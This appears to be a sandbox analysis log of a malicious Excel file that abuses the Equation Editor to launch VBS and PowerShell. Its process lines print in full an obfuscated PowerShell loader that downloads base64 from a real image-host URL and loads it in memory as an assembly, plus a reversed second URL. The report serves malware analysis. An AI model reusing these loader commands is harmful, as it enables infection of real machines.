Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: .......................................(.P.....`.......h.......D........K.........................s...................T.......H.&.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....`.......h.......D........K.........................s............H.................*.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....`.......h.......0........L.........................s............H...............H.&.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....`.......h.......D........L.........................s............H...............H.&.............	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: xF3wienia PO2102559-1.xlsx	ReversingLabs: Detection: 63%
Source: xF3wienia PO2102559-1.xlsx	Virustotal: Detection: 53%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\word.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\word.vbs"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
